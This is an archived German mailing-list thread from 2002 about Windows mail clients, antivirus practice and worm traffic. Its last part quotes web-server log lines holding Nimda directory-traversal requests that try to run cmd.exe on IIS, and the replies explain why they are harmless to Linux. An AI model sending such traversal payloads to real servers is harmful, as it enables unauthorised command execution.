Ist ja jetzt die Version 4.0 draußen. Momentan gibts dafür keine deutsche Sprachunterstützung, aber wen kratzt das, wenn man einen vernünftigen Mailer unter Windows will?

Die fehlende deutsche Sprachunterstützung? Irrelevant! Pegasus ist schon ein nettes Teil, leider lässt die Stabilität etwas zu wünschen übrig. Die Verwaltung der Ordner funktioniert nicht richtig ... Trotzdem, zur Zeit arbeite ich nur mit pegasus. mit freundlichen Grüßen Jörg Zimmermann ------------------------------------------- .xsiteing agentur für netzkommunikation 42117 wuppertal - friedrich-ebert-str. 141b tel: 0202/3097070 - fax: 0202/3097072

Alex Klein

8 Jan 8 Jan

18:18

Hallo, * Am 08.01.2002 zauberte Jörg Zimmermann:

...

Hi Alex, On 7 Jan 2002 at 0:31, Alex Klein wrote:

...
* Am 07.01.2002 zauberte Sebastian Helms:

...
Moin Thomas,

...
On Sam, 05 Jan 2002, Jörg Zimmermann sent incredible lines:

...
Einen anderen MUA, ja gerne. Nenne mir eine ernsthafte Alternative.

Unter Windows? z.B. Pegasus

Ist ja jetzt die Version 4.0 draußen. Momentan gibts dafür keine deutsche Sprachunterstützung, aber wen kratzt das, wenn man einen vernünftigen Mailer unter Windows will?

Die fehlende deutsche Sprachunterstützung? Irrelevant! Pegasus ist schon ein nettes Teil, leider lässt die Stabilität etwas zu wünschen übrig. Die Verwaltung der Ordner funktioniert nicht richtig ... Trotzdem, zur Zeit arbeite ich nur mit pegasus.

Hmm. Ich arbeite jetzt schon sehr lange mit Pegasus Mail unter Windows. Die Maildaten liegen dabei auf einem Samba-Server und ich hab gelegentlich auch PMail unter mehreren Clients gleichzeitig offen. Bisher hatte ich IIRC _einmal_ das Problem, daß er mir in einem Ordner die Mails nicht mehr angezeigt hat. Allerdings hab ich die Indexe neu erstellen lassen und dann war wieder alles da (wie gesagt IIRC). Sollte man wirklich mal einen Crash haben, dann hat man ja eine Datensicherung (zumindest geh ich bei Jörg mal davon aus ;)). -- Gruß Alex -- besser eingebildet ausgeh'n, als ausgebildet eingeh'n ;-) [Claudia Gabel in dag°]

Thomas Bendler

7 Jan 7 Jan

17:41

Hi, On Son, 06 Jan 2002, Sebastian Helms sent incredible lines:

...

* Thomas Bendler schrieb am 06 Jan 2002:

...
On Sam, 05 Jan 2002, Jörg Zimmermann sent incredible lines:

...
Einen anderen MUA, ja gerne. Nenne mir eine ernsthafte Alternative. [...] Mutt + Cygwin Tools, Xemacs + GNUS, diverse Python und Tcl Mailer, Unter Windows? z.B. Pegasus

Na klar unter Windows, alle aufgezählten Programme laufen auch unter Windows (bei mir auf einer NT Box, siehe andere Mail zum Thema). ... may the Tux be with you! =Thomas= -- Thomas Bendler \\:// ml@bendler-net.de Billwiese 22 (o -) http://www.bendler-net.de/ 21033 Hamburg ---ooO-(_)-Ooo--- tel.: 0 177 - 277 37 61 Germany Linux, enjoy the ride ...!

dieter

5 Jan 5 Jan

17:04

Hi, muß mich mal einklinken: Am Fre, 2002-01-04 um 23.12 schrieb Ratti:

...

Natürlich ist das Risiko unter Win aufgrund der beschissenen Systemarchitektur und der teilweise merkwürdigen Userschaft ungleich größer - aber wie groß ist es "in Absolut"?

Ich habe in den letzten Jahren keinen Windows-Virus zu Gesicht bekommen. Ausnahme: Besagter Mail/VBS/ActiveX-Blödsinn, und der ist leicht zu verhindern, siehe oben.

ich bin in den letzten 3 Wochen in 4 Firmen gewesen um Würmer zu entfernen. Alle Rechner im Netz befallen, weil die zu dämlich waren oder zu geizig, um einen Virenscanner anzuschaffen. Weißt du, was die nun bezahlen mußten? In den Firmen ist das halt ab jetzt anders. Merkens nur über das Budget! Zu geizig das Netzwerk betreuen zu lassen, zu geizig Virenscanner anzuscahaffen. Klar, mich hats gefreut --> hab jetzt Wartungsvertrag. Aber in der Zeit, in der ich die Rechner gesäubert hatte, haben schätzungsweise 50 Kunden angerufen, die verseuchte Mails bekommen haben. Welch ein Imageverlust.

...

Für den Verdachtsfall genügt ein simpler Scanner wie F-Prot, der manuell gestartet wird.

s.o.

...

Dazu gibt es nunmal keine Alternative. _Jeder_ mir bekannte Virenscanner, der sich unter Win ins System hängt, richtete noch immer mehr Schaden an, als er nützte. Da läuft nix mehr stabil, und genau deswegen habe ich völlig problemlos seit etlichen Jahren keinen Virenscanner - sowohl privat als auch in der Firma (Dort gibt es allerdings auch keine User Marke "Ich klick alles").

Mumpitz. Es gibt allerdings erklärte Inkompatibilitäten mit bestimmten Programmen. Kann man in der Regel im Vorfeld abklären. ciao dieter

Florian Gross

19:56

* dieter textete am 05.01.02: Dein Vor- und Zuname im Absender wäre nett.

...

ich bin in den letzten 3 Wochen in 4 Firmen gewesen um Würmer zu entfernen. Alle Rechner im Netz befallen, weil die zu dämlich waren oder zu geizig, um einen Virenscanner anzuschaffen. Weißt du, was die nun bezahlen mußten? In den Firmen ist das halt ab jetzt anders. Merkens nur über das Budget!

Und nachher wird's so gemacht wie die tollen 'Admins' in einem von unseren Zweigstellen. Die starten den Virenscanner 'bei Bedarf'. Bei ca. 800 bis 1000 Adressen im Adressbuch, 100MBit- Netz und einer netten AS/400 geht das schön schnell, bis alles dicht ist. Die Load war jedenfalls nicht schlecht...

...

Aber in der Zeit, in der ich die Rechner gesäubert hatte, haben schätzungsweise 50 Kunden angerufen, die verseuchte Mails bekommen haben. Welch ein Imageverlust.

Das ist doch heute gar nicht mehr so schlimm. Kann doch mal passieren. Passiert doch anderen auch. Jedenfalls sehe ich diese Einstellung immer öfter. cu flo -- Man kann keine Fehler beim Abtrennen einer Sig machen, da eine falsch abgetrennte Sig keine Sig mehr ist und folglich auch nicht korrekt abgetrennt werden muss. [Jan Weseler in dagh-l]

Ratti

20:19

Hallo, Ratti:

...

...
Dazu gibt es nunmal keine Alternative. _Jeder_ mir bekannte Virenscanner, der sich unter Win ins System hängt, richtete noch immer mehr Schaden an, als er nützte.

dieter:

...

Mumpitz. Es gibt allerdings erklärte Inkompatibilitäten mit bestimmten Programmen. Kann man in der Regel im Vorfeld abklären.

Eben. "Inkompatibilitäten" - Grund genug, keinen Virenscanner zu verwenden, wenn dr Schaden größer ist als der Nutzen. Aus deinem Text geht klar hervor, daß du Würmer beschreibst, die sich "Dank" Outlook verbreiten. Scripting in Outlook deaktivieren (oder anderen MUA nehmen), Mozilla statt Explorer - wozu brauche ich dann noch einen Virenscanner? Bootsektorviren? Schon seit Jahren nichts mehr davon gehört. Linkviren ebenso. Verseuchte Downloads - das ist ein interessanter Punkt. Auch sowas habe ich noch nie gesehen, und ich surfe an merkwürdigen Ecken des Netzes, aber da lässt sich per F-Prot manuell was machen. Bleibt Office und seine Makroviren. Nutze ich nur als Textverarbeitung ohne "Außenkontakt". Diese ständig-alles-runterreissenden-"Ich häng mich überall rein"-Virenscanner richten einen Haufen Schaden an und sind nur dann nötig, wenn man notorische Allesklicker als User hat. Das betrifft weder mich privat, noch die Arbeitskollegen, die mit Windows arbeiten, das sind alles Programmierer. Die "normalen" User nutzen alle Macs und haben auch einen Virenscanner drauf, um Office-Makroviren abzufangen. Wer seinen Rechner anständig bedient, braucht keinen Virenscanner. Wer das nicht kann, wiegt sich mit Scanner in falscher Sicherheit, dem kann man auch FORMAT.COM mailen, den Rest macht er selbst. Ein Sicherheitsgurt ersetzt nicht den Führerschein. Ich habe mir hier inzwischen Amavis auf den Mailserver aufgespielt, aber das ist reine Bequemlichkeit. Ich spare die Arbeit, Wurmmails zu ignoriereb. :-) Gruß, Ratti

Martin Walter

20:41

Hallo miteinander, da ich im Moment nicht so sehr viel mache, außer an meinem Mac zu Programmieren, geb' ich hier auch mal meinen Senf ab. * 05.01.2002 20:19 Uhr, Ratti ratti@gesindel.de:

...

Hallo,

Ratti:

...
...
Dazu gibt es nunmal keine Alternative. _Jeder_ mir bekannte Virenscanner, der sich unter Win ins System hängt, richtete noch immer mehr Schaden an, als er nützte.

dieter:

...
Mumpitz. Es gibt allerdings erklärte Inkompatibilitäten mit bestimmten Programmen. Kann man in der Regel im Vorfeld abklären.

Richtig, das ist übrigens bei jeder Software wichtig. Im übrigen auch bei Firewalls, oder Virenscannern im Gateway-Bereich. Vielleicht kennt einer die tollen Wechselwirkungen von Windows Terminalservern im Zusammenhang mit McAfee Netshield?!?!?

...

Bootsektorviren? Schon seit Jahren nichts mehr davon gehört. Linkviren ebenso. Verseuchte Downloads - das ist ein interessanter Punkt. Auch sowas habe ich noch nie gesehen, und ich surfe an merkwürdigen Ecken des Netzes, aber da lässt sich per F-Prot manuell was machen. Bleibt Office und seine Makroviren. Nutze ich nur als Textverarbeitung ohne "Außenkontakt".

Da muß ich allerdings auch mal was zu sagen. Vielleicht erinnert sich der ein oder andere an die beiden Viren CIH und Pegasus (meine persönlichen Lieblinge), die beide vor nicht allzu langer Vergangenheit eine neue Renaissance feierten. Diese beiden Mistviecher fressen sich in das Bios. Es ist zwar kein Problem sie zu beseitigen, aber trotzdem ärgerlich.

...

Diese ständig-alles-runterreissenden-"Ich häng mich überall rein"-Virenscanner richten einen Haufen Schaden an und sind nur dann nötig, wenn man notorische Allesklicker als User hat.

Sorry, aber ein gut konfigurierter Virenscanner reißt gar nichts runter. Man muß ihn ebenso konfigurieren wie ein Windows, Unix oder MacOS System. Jeder Computer ist nur so gut, wie der, der ihn konfiguriert.

...

Das betrifft weder mich privat, noch die Arbeitskollegen, die mit Windows arbeiten, das sind alles Programmierer.

Bei uns sind es gerade die Programmierer, die das ein oder andere einschleppen, und uns Jungens von der IT Security dann dumm anlabern.

...

Die "normalen" User nutzen alle Macs und haben auch einen Virenscanner drauf, um Office-Makroviren abzufangen.

Ich arbeite hier wie oben angeführt auch an meinem Mac. Der Mac ist um einiges besser als diese doofen Windows Büchsen. Es gibt für Macs zwar nicht viele Viren, aber auch die sind besser wie auf Windoof. Da gibt es weit mehr als diese dummen Macroviren (bspw. nVir, AIDS, T4 oder ZUC), manche davon sind ziemlich herb, und übertreffen die meisten Windows Viren.

...

Wer seinen Rechner anständig bedient, braucht keinen Virenscanner. Ich habe mir hier inzwischen Amavis auf den Mailserver aufgespielt, aber das ist reine Bequemlichkeit. Ich spare die Arbeit, Wurmmails zu ignoriereb. :-)

Hab ich auch, der schütz mich allerdings nicht vor irgendwelchen js-viren. Leider Gottes braucht man auf nahezu jeder zweiten Website mittlerweile Javascript um zu irgendwelchen Support bereichen zu kommen. Grüße Martin

Florian Gross

18:56

* Martin Neuditschko textete am 04.01.02:

...

Und ich bin immer noch sicher, daß ca. 50% der Windowsuser keinen Antivirus laufen haben.

Optimist. cu flo -- Nein. Das darf doch nicht wahr sein. Gerade ist der Troll unter dem Eichentisch entsorgt worden und schon ist er wieder da. [Rainer Behrendt in dag°]

Sebastian Helms

6 Jan 6 Jan

22:11

Moin Martin, * Martin Neuditschko schrieb am 04 Jan 2002:

...

On Fri, Jan 04, 2002 at 08:19:13PM +0100, Yann Wissenbach wrote:

...
und mir und anderen somit die log files zuhauen. auch in meiner firma kommt an JEDEN server andauernd nimda anfragen, und nur wegen solch leuten, wie hier teilweise im internet kursieren.

Und? Wenn dich das nervt, dann schreib ein Script oder konfigurier das Proggie welches diese Dinge loggt, so daß die Warnungen über solche Nebensächlichkeiten gar nicht ins logfile kommen. Nebensächlichkeit desswegen, weil das ja alltäglich ist und sowieso keinen Schaden anrichtet.

Oh... dann haben die Würmer das Internet also nicht - zumindest zum Teil - lahmgelegt? Haben keinen Traffic verursacht, der in den Größenordnungen schon eine ganze Menge Geld kostet? Haben nicht Server ausfallen lassen oder vom Netz abgeschnitten, mit denen Firmen Geld verdienen und die dadurch Verdienstausfälle hatten? Oh, achso, dann ist das natürlich was anderes. Entschuldige bitte, alle die sich mit Virenschutz abgeben, sind wohl nur übervorsichtige Spinner.... Was anderes als ein *plonk* hat die Einstellung wirklich nicht verdient, und ich habe lange genug diesen Thread mitgelesen, um mich nun doch umzuentscheiden... Sebastian -- Do not meddle in the affairs of Wizards, for they are subtle and quick to anger. Sebastian Helms - http://www.helms.sh - mailto:mail@helms.sh (PGP welcome) SuSE-Linux-Mailinglisten-FAQ: http://www.helms.sh/faq/

Felix Sames

3 Jan 3 Jan

06:42

New subject: AW: Ext. Zugriffe auf Webserver...

...

...
Willkommen auf dem Planeten Erde! 1.) Deinstallier deinen httpd, ftpd, smtpd, popd, ...

Hä? Wieso das?

Das Frag ich mich auch grad

...

2.) Ruf www.securityfocus.com und www.cert.org auf 3.) [x] geh weg!

...

Ich fasse es nicht.. es gibt doch tatsaechlich noch Menschen die noch nichts ueber Wuermer wie CodeRed und/oder Nimda gehoert haben. Wegen Leuten wie *dir* entstehen Schaeden in Millionenhoehe! Wegen Leuten wie *dir* ist es ueberhaupt erst moeglich, dasz sich solche Wuermer ausbreiten koennen!

Was soll die ganze Sache hier? Wenn du nichts konstruktives Beizutragen hast dann sei doch bitte gaenzlich still... (haette doch fast "Halts Maul!" gesagt) ich hab kaum Ahnung von Wuermern... warum sollte ich auch? Ich hatte nie einen und Mails die von jemandem kommen den ich nicht kenne werden eh geloescht. Des Weiteren werden bei mir alle eingehenden Mails auf Viren ueberprueft da alles durch Linux auf Windows geht.

...

*PLONK*

Und jetzt noch ne frage von mir *G* wtf heisst PLONK?! Mit freundlichen Grüßen Felix

Christian Schneider

06:31

New subject: AW: Ext. Zugriffe auf Webserver...

* Felix Sames wrote:

...

[...]

...
*PLONK*

Und jetzt noch ne frage von mir *G* wtf heisst PLONK?! ,----[http://www.volker-gringmuth.de/usenet/begriffe.htm] | *PLONK* | Das Geräusch, das entsteht, wenn der Name eines Mitlesers | auf dem Boden eines Killfiles aufschlägt. Wenn auf einen | Beitrag von dir jemand mit "PLONK" antwortet, dann will er | damit ausdrücken, dass du dich dermaßen daneben benommen | hast, dass er Beiträge von dir grundsätzlich nicht für | lesenswert hält und dich deshalb in sein Killfile eingetragen hat. `----

...

Mit freundlichen Grüßen

Felix dito Chris -- http://3d-crew.com "Die Tastatur finden Sie, indem Sie das Kabel verfolgen, das mit einem 5poligen DIN-Stecker an der Rueckseite Ihres Rechners angebracht ist." aus der CrossPoint Hilfe

Thorsten Haude

11:17

Moin, * Christian Schneider [02-01-03 03:45]:

...

3.) [x] geh weg!

Ich fasse es nicht.. es gibt doch tatsaechlich noch Menschen die noch nichts ueber Wuermer wie CodeRed und/oder Nimda gehoert haben. Wegen Leuten wie *dir* entstehen Schaeden in Millionenhoehe! Wegen Leuten wie *dir* ist es ueberhaupt erst moeglich, dasz sich solche Wuermer ausbreiten koennen!

*PLONK* Merkst Du die Einschläge noch? Da hat jemand seine Logs kontrolliert, verdächtige Einträge gefunden und fragt um Rat; Du beschwerst Dich darüber? Das ist Linux-Advocacy auf Bildniveau.

Thorsten -- It is dangerous to be right when the government is wrong. - Voltaire

Stefan Onken

07:21

Am Donnerstag, 3. Januar 2002 03:00 schrieb Ekki Plicht:

...

Darf ich davon ausgehen das jemand mit einem Portscanner meinen Server entdeckt hat während ich online war, und dann versucht hat darauf zuzugreifen? Ich vermute mal, das die Einträge (s.u.) darauf hinweisen, das verschiedene Exploits ausprobiert wurden.

fast richtig. Es gibt verschiedene Würmer, die Schwachstellen vom Microsoft Internet Server (ISS) ausnutzen. Diese rufen bestimmte URL's auf. Nun ist es so, daß diese zwar in Deinen Logs auftauchen, aber keine Gefahr für Dich darstellen. Dein Rechner wird also weder infiziert noch zur weiteren Verbreitung eingesetzt. Es kann natürlich vorkommen, daß auch unter Apache irgendwann ein solcher Wurm entdeckt wird. Daher die ein wenig seltsame Mail von Christian Schneider. Solange Du einen Server ins Netz stellst, solltest Du Dich zumindest rudimentär mit Sicherheitsproblemen beschäftigen. Wenn Du also z.B. den Webserver nur intern brauchst, kann Du mit der Firewall Port 80 von außen Sperren, so daß von außen keine Zugrifft mehr möglich sind. cu stonki

Thomas Templin

07:36

On Thursday, 3. January 2002 07:21, Stefan Onken wrote:

...

Am Donnerstag, 3. Januar 2002 03:00 schrieb Ekki Plicht:

...
Darf ich davon ausgehen das jemand mit einem Portscanner meinen Server entdeckt hat während ich online war, und dann versucht hat darauf zuzugreifen? Ich vermute mal, das die Einträge (s.u.) darauf hinweisen, das verschiedene Exploits ausprobiert wurden.

fast richtig. Es gibt verschiedene Würmer, die Schwachstellen vom Microsoft Internet Server (ISS) ausnutzen. Diese rufen bestimmte URL's auf. Nun ist es so, daß diese zwar in Deinen Logs auftauchen, aber keine Gefahr für Dich darstellen. Dein Rechner wird also weder infiziert noch zur weiteren Verbreitung eingesetzt.

Es kann natürlich vorkommen, daß auch unter Apache irgendwann ein solcher Wurm entdeckt wird. Daher die ein wenig seltsame Mail von Christian Schneider. Solange Du einen Server ins Netz stellst, solltest Du Dich zumindest rudimentär mit Sicherheitsproblemen beschäftigen. Wenn Du also z.B. den Webserver nur intern brauchst, kann Du mit der Firewall Port 80 von außen Sperren, so daß von außen keine Zugrifft mehr möglich sind.

Es gibt Übrigens seit langem schon Mechanismen auf Unix Systemen die dies ausnutzen, um solche Würmer auszubremsen oder zu bekämpfen. Gegen CodeRed gibt es ein Tool mit Namen CodeBlue, das dem CodeRed zwar antwortet aber keine Daten schickt. Eine sogenannte Teergrube oder auf gut Englisch tarpit. Gegen Nimde gibt es einige Tools, die ein Script genau mit den von Nimda abgefragten Stelle steht. Dieses Script wird dann ausgeführt und sendet eine Mail, die den Administrator des befallenen Systemes darüber informiert, dass sein System von Nimda befallen ist. Das ist dann ein sogenannter Honig Topf oder honeypod auf Englisch. Es gibt allerdings auch eine etwas kriminelle Variante, die macht sich die bekannten Sicherheitslücken zu eigen und versucht die befallene Maschine abzuschiessen, wie gesagt "etwas kriminell" :-) Tschüss, Thomas -- quit When the quit statement is read, the bc processor is terminated, regardless of where the quit state- ment is found. For example, "if (0 == 1) quit" will cause bc to terminate. (Seen in the manpage for "bc". Note the "if" statement's logic)

Thorsten Körner

11:59

Am Don, 2002-01-03 um 03.00 schrieb Ekki Plicht: ...snipp

...

/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 xx.xx.xx.xx - - [02/Jan/2002:22:02:17 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3 xx.xx.xx.xx - - [02/Jan/2002:22:02:17 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307

Hallo Ekki Diese Einträge stammen von Nimda, stellen also für einen Linux-Rechner keine Gefahr dar, können dort nichts ausrichten und sich auch nicht von dort weiter verbreiten. Ärgerlich ist allerdings, das das Logfile gigantische Dimensionen annehmen kann. Wenn Du keinen externen Zugriff auf den Rechner brauchst dann nagel die Kiste zu. Das geht ganz leicht mit der SuSE-Persononal-Firewall. Allerdings nur wenn Du sie ganz von außen unerreichbar machen willst. Sonst richtigen Firewall installieren. Lass Dich nicht entmutigen, _JEDER_ hier auf der Liste hat mal angefangen. CU Thorsten

Ekki Plicht

14:33

Thorsten Körner wrote:

...

Am Don, 2002-01-03 um 03.00 schrieb Ekki Plicht: ...snipp

...
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 xx.xx.xx.xx - - [02/Jan/2002:22:02:17 +0000] "GET

[snip]

...

Hallo Ekki Diese Einträge stammen von Nimda, stellen also für einen Linux-Rechner keine Gefahr dar, können dort nichts ausrichten und sich auch nicht von dort weiter verbreiten. Ärgerlich ist allerdings, das das Logfile gigantische Dimensionen annehmen kann. Wenn Du keinen externen Zugriff auf den Rechner brauchst dann nagel die Kiste zu. Das geht ganz leicht mit der SuSE-Persononal-Firewall. Allerdings nur wenn Du sie ganz von außen unerreichbar machen willst. Sonst richtigen Firewall installieren.

Hallo Thorsten, Stellvertretend hier für (fast) alle die geantwortet haben - Danke. Ja, da habe ich nach der Installation die pers.FW installiert, dann aber beim rumtesten mal abgeschaltet. Naja, jetzt weiß ich wenigstens wie sowas aussieht. Auch ein Lerneffekt. Ich brauche keinen externen Zugriff auf die Kiste, ist alles nur für intern gedacht und soll irgendwann mal (wenn ich groß bin) als sicheres Gateway zum Internet für meine Win-Clients dienen, sowie als Entwicklungsumgebung für CGI scripts. Deswegen der httpd.

...

Lass Dich nicht entmutigen, _JEDER_ hier auf der Liste hat mal angefangen.

In der Tat. Die Linux-Büchse läuft hier seit 3 Tagen, ist meine erste Begegenung mit dem OS. Da muß ich noch einiges lernen. Das da jemand etwas cholerisch geantwortet hat ist ein bekanntes Phänomen, aus dem Usenet jedenfalls. Er hat wohl schlecht geschlafen, oder länger keinen (guten) Sex mehr gehabt, kommt vor. Jetzt kann ich voll Stolz sagen 'auch ich stehe in einem Killfile' :-). Und ich habe gelernt mein eigenes Killfile zu verwenden, noch'n Lerneffekt. Letzteres Phänomen (weniger Sex) habe ich allerdings auch, seitdem ich mich nächtelang mit Linux beschäftige... so ein bischen seltsam ist die ganze Administration ja schon, finde ich. Wobei ich halt versuche, das Ganze auch ohne Yast/Yast2 zu machen, denn ich würde gerne verstehen was dahinter vorgeht. Pers.FW läuft wieder und irgendwann werde ich auch lernen mit Iptables umzugehen. Danke nochmals für alle konstruktiven Hinweise. Gruß, Ekki

8146

Age (days ago)

8151

Last active (days ago)

List overview

Download

70 comments

27 participants

participants (27)

Alex Klein
Andreas Allgeyer
B.Brodesser＠t-online.de
Christian Schneider
Christian Sprenger
dieter
Ekki Plicht
Felix Sames
Florian Gross
Heimo Ponnath
Heiner Lamprecht
Jörg Zimmermann
Maik Holtkamp
Manfred Tremmel
Marko Hoffmann
Martin Neuditschko
Martin Walter
Michael Raab
Ratti
Rene Engelhard
Sebastian Helms
Stefan Onken
Thomas Bendler
Thomas Templin
Thorsten Haude
Thorsten Körner
Yann Wissenbach